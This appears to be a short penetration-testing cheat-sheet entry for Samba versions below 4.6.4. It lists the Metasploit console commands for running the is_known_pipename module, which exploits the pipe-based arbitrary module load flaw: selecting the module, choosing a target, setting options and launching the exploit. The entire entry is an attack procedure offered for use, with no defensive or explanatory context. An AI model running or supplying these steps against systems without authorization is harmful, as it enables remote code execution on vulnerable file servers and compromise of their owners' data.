Samba <4.6.4

Pipeline - Arbitrary Module Load

msf > use exploit/linux/samba/is_known_pipename
msf exploit(is_known_pipename) > show targets
    ...targets...
msf exploit(is_known_pipename) > set TARGET < target-id >
msf exploit(is_known_pipename) > show options
    ...show and set options...
msf exploit(is_known_pipename) > exploit

Last updated